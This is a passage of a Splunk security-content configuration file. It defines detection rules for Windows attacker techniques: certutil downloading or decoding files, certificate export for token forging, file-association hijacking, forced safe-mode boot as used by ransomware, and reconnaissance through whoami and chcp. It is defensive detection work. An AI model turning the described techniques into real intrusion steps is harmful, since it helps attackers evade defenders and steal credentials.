action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = Certutil.exe may download a file from a remote destination using `-urlcache`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. However, it is uncommon for `certutil.exe` to write files to world-writable paths.\
During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited false positives in most environments; however, tune as needed based on the parent-child relationship or network connection.
action.escu.creation_date = 2022-02-03
action.escu.modification_date = 2022-02-03
action.escu.confidence = high
action.escu.full_search_name = ESCU - CertUtil Download With URLCache and Split Arguments - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ingress Tool Transfer", "DarkSide Ransomware", "Living Off The Land", "ProxyNotShell", "CISA AA22-277A", "Flax Typhoon", "Forest Blizzard"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to download a file.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 90}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - CertUtil Download With URLCache and Split Arguments - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ingress Tool Transfer", "DarkSide Ransomware", "Living Off The Land", "ProxyNotShell", "CISA AA22-277A", "Flax Typhoon", "Forest Blizzard"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = Certutil.exe may download a file from a remote destination using `-urlcache`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. However, it is uncommon for `certutil.exe` to write files to world-writable paths.\
During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question.
action.notable.param.rule_title = CertUtil Download With URLCache and Split Arguments
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*urlcache* Processes.process=*split*) OR Processes.process=*urlcache* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.original_file_name Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `certutil_download_with_urlcache_and_split_arguments_filter`

[ESCU - CertUtil Download With VerifyCtl and Split Arguments - Rule]
action.escu = 0
action.escu.enabled = 1
description = Certutil.exe may download a file from a remote destination using `-VerifyCtl`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. \
During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. Using `-VerifyCtl`, the file will be written either to the current working directory or to `%APPDATA%\..\LocalLow\Microsoft\CryptnetUrlCache\Content\`.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = Certutil.exe may download a file from a remote destination using `-VerifyCtl`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. \
During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. Using `-VerifyCtl`, the file will be written either to the current working directory or to `%APPDATA%\..\LocalLow\Microsoft\CryptnetUrlCache\Content\`.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited false positives in most environments; however, tune as needed based on the parent-child relationship or network connection.
action.escu.creation_date = 2022-02-03
action.escu.modification_date = 2022-02-03
action.escu.confidence = high
action.escu.full_search_name = ESCU - CertUtil Download With VerifyCtl and Split Arguments - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ingress Tool Transfer", "DarkSide Ransomware", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to download a file.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 90}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - CertUtil Download With VerifyCtl and Split Arguments - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ingress Tool Transfer", "DarkSide Ransomware", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = Certutil.exe may download a file from a remote destination using `-VerifyCtl`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. \
During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. Using `-VerifyCtl`, the file will be written either to the current working directory or to `%APPDATA%\..\LocalLow\Microsoft\CryptnetUrlCache\Content\`.
action.notable.param.rule_title = CertUtil Download With VerifyCtl and Split Arguments
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*verifyctl* Processes.process=*split*) OR Processes.process=*verifyctl* by Processes.dest Processes.user Processes.original_file_name Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `certutil_download_with_verifyctl_and_split_arguments_filter`

[ESCU - Certutil exe certificate extraction - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for arguments to certutil.exe indicating the manipulation or extraction of a certificate. This certificate can then be used to sign new authentication tokens, especially inside federated environments such as Windows ADFS.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for arguments to certutil.exe indicating the manipulation or extraction of a certificate. This certificate can then be used to sign new authentication tokens, especially inside federated environments such as Windows ADFS.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Unless there are specific use cases, manipulating or exporting certificates using certutil is uncommon. Extraction of certificates has been observed during attacks such as Golden SAML and other campaigns targeting federated services.
action.escu.creation_date = 2022-07-15
action.escu.modification_date = 2022-07-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Certutil exe certificate extraction - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Persistence Techniques", "Cloud Federated Credential Abuse", "Living Off The Land", "Windows Certificate Services"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to export a certificate.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 63}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 63}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Certutil exe certificate extraction - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Persistence Techniques", "Cloud Federated Credential Abuse", "Living Off The Land", "Windows Certificate Services"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for arguments to certutil.exe indicating the manipulation or extraction of a certificate. This certificate can then be used to sign new authentication tokens, especially inside federated environments such as Windows ADFS.
action.notable.param.rule_title = Certutil exe certificate extraction
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=certutil.exe Processes.process = "*-exportPFX*" by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `certutil_exe_certificate_extraction_filter`

[ESCU - CertUtil With Decode Argument - Rule]
action.escu = 0
action.escu.enabled = 1
description = CertUtil.exe may be used to `encode` and `decode` a file, including PE and script code. Encoding will convert a file to base64 with `-----BEGIN CERTIFICATE-----` and `-----END CERTIFICATE-----` tags. Malicious usage will include decoding an encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - `encodehex` and `decodehex`. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1140"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = CertUtil.exe may be used to `encode` and `decode` a file, including PE and script code. Encoding will convert a file to base64 with `-----BEGIN CERTIFICATE-----` and `-----END CERTIFICATE-----` tags. Malicious usage will include decoding an encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - `encodehex` and `decodehex`. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Typically seen used to `encode` files, but it is possible to see legitimate use of `decode`. Filter based on parent-child relationship, file paths, endpoint or user.
action.escu.creation_date = 2021-03-23
action.escu.modification_date = 2021-03-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - CertUtil With Decode Argument - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Deobfuscate-Decode Files or Information", "Living Off The Land", "Forest Blizzard", "APT29 Diplomatic Deceptions with WINELOADER"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to decode a file.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 40}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 40}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - CertUtil With Decode Argument - Rule
action.correlationsearch.annotations = {"analytic_story": ["Deobfuscate-Decode Files or Information", "Living Off The Land", "Forest Blizzard", "APT29 Diplomatic Deceptions with WINELOADER"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1140"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = CertUtil.exe may be used to `encode` and `decode` a file, including PE and script code. Encoding will convert a file to base64 with `-----BEGIN CERTIFICATE-----` and `-----END CERTIFICATE-----` tags. Malicious usage will include decoding an encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - `encodehex` and `decodehex`. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis.
action.notable.param.rule_title = CertUtil With Decode Argument
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` Processes.process=*decode* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `certutil_with_decode_argument_filter`

[ESCU - Change Default File Association - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects suspicious registry modifications that change a default file association in Windows to a malicious payload. This technique was seen in some APT campaigns, where the adversary modifies the default process for a file association, such as .txt to notepad.exe; instead of notepad.exe, the association points to a script or other payload that loads malicious commands on the compromised host.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.001", "T1546"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects suspicious registry modifications that change a default file association in Windows to a malicious payload. This technique was seen in some APT campaigns, where the adversary modifies the default process for a file association, such as .txt to notepad.exe; instead of notepad.exe, the association points to a script or other payload that loads malicious commands on the compromised host.
action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Change Default File Association - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Hermetic Wiper", "Windows Registry Abuse", "Prestige Ransomware", "Windows Privilege Escalation", "Windows Persistence Techniques", "Data Destruction"]
action.risk = 1
action.risk.param._risk_message = modified/added/deleted registry entry $Registry.registry_path$ in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Change Default File Association - Rule
action.correlationsearch.annotations = {"analytic_story": ["Hermetic Wiper", "Windows Registry Abuse", "Prestige Ransomware", "Windows Privilege Escalation", "Windows Persistence Techniques", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.001", "T1546"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects suspicious registry modifications that change a default file association in Windows to a malicious payload. This technique was seen in some APT campaigns, where the adversary modifies the default process for a file association, such as .txt to notepad.exe; instead of notepad.exe, the association points to a script or other payload that loads malicious commands on the compromised host.
action.notable.param.rule_title = Change Default File Association
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path ="*\\shell\\open\\command\\*" Registry.registry_path = "*HKCR\\*" by Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `change_default_file_association_filter`

[ESCU - Change To Safe Mode With Network Config - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a suspicious bcdedit command line that configures the host to boot in safe mode with networking. This technique was seen in BlackMatter ransomware, which forces the compromised host to boot into safe mode to continue its encryption and then restores normal boot using the bcdedit deletevalue command. This TTP can be a good alert for a host that was forced to boot into safe mode, since the boot configuration must be modified to bring it back to normal.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects a suspicious bcdedit command line that configures the host to boot in safe mode with networking. This technique was seen in BlackMatter ransomware, which forces the compromised host to boot into safe mode to continue its encryption and then restores normal boot using the bcdedit deletevalue command. This TTP can be a good alert for a host that was forced to boot into safe mode, since the boot configuration must be modified to bring it back to normal.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-09-06
action.escu.modification_date = 2021-09-06
action.escu.confidence = high
action.escu.full_search_name = ESCU - Change To Safe Mode With Network Config - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["BlackMatter Ransomware"]
action.risk = 1
action.risk.param._risk_message = bcdedit process with command line $process$ to force a safe mode boot on $dest$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Change To Safe Mode With Network Config - Rule
action.correlationsearch.annotations = {"analytic_story": ["BlackMatter Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects a suspicious bcdedit command line that configures the host to boot in safe mode with network config. This technique was seen in BlackMatter ransomware, which forces the compromised host to boot in safe mode to continue its encryption and then brings it back to normal boot using the bcdedit deletevalue command. This TTP can be a good alert for a host that was forcibly booted into safe mode, since the boot configuration must be modified to bring it back to normal.
action.notable.param.rule_title = Change To Safe Mode With Network Config
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = bcdedit.exe Processes.process="*/set*" Processes.process="*{current}*" Processes.process="*safeboot*" Processes.process="*network*" by Processes.process_name Processes.process Processes.parent_process_name Processes.dest Processes.user |`drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `change_to_safe_mode_with_network_config_filter`

[ESCU - CHCP Command Execution - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects execution of the chcp.exe application. This utility is used to change the active code page of the console. This technique was seen in IcedID malware to determine the locale region/language/country of the compromised host.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects execution of the chcp.exe application. This utility is used to change the active code page of the console. This technique was seen in IcedID malware to determine the locale region/language/country of the compromised host.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Other tools or scripts may use this to change the code page to UTF-* or others.
action.escu.creation_date = 2021-07-27
action.escu.modification_date = 2021-07-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - CHCP Command Execution - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["IcedID", "Azorult", "Forest Blizzard"]
action.risk = 1
action.risk.param._risk_message = parent process $parent_process_name$ spawning chcp process $process_name$ with parent command line $parent_process$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 9}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - CHCP Command Execution - Rule
action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Azorult", "Forest Blizzard"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects execution of the chcp.exe application. This utility is used to change the active code page of the console. This technique was seen in IcedID malware to determine the locale region/language/country of the compromised host.
action.notable.param.rule_title = CHCP Command Execution
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=chcp.com Processes.parent_process_name = cmd.exe (Processes.parent_process=*/c* OR Processes.parent_process=*/k*) by Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process Processes.process_id Processes.parent_process_id Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `chcp_command_execution_filter`

[ESCU - Check Elevated CMD using whoami - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a suspicious whoami execution that checks whether the cmd or shell instance process is running with elevated privileges. This technique was seen in the FIN7 JS implant, which executes it as part of its data collection on the infected machine to check whether the running shell cmd process is elevated. This TTP is a good alert for a known attacker performing reconnaissance on the targeted host. This command is not commonly executed by a normal user, or even an admin, to check whether a process is elevated.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects a suspicious whoami execution that checks whether the cmd or shell instance process is running with elevated privileges. This technique was seen in the FIN7 JS implant, which executes it as part of its data collection on the infected machine to check whether the running shell cmd process is elevated. This TTP is a good alert for a known attacker performing reconnaissance on the targeted host. This command is not commonly executed by a normal user, or even an admin, to check whether a process is elevated.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-09-15
action.escu.modification_date = 2021-09-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Check Elevated CMD using whoami - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["FIN7"]
action.risk = 1
action.risk.param._risk_message = Process name $process_name$ with commandline $process$ in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Check Elevated CMD using whoami - Rule
action.correlationsearch.annotations = {"analytic_story": ["FIN7"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects a suspicious whoami execution that checks whether the cmd or shell instance process is running with elevated privileges. This technique was seen in the FIN7 JS implant, which executes it as part of its data collection on the infected machine to check whether the running shell cmd process is elevated. This TTP is a good alert for a known attacker performing reconnaissance on the targeted host. This command is not commonly executed by a normal user, or even an admin, to check whether a process is elevated.
action.notable.param.rule_title = Check Elevated CMD using whoami
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
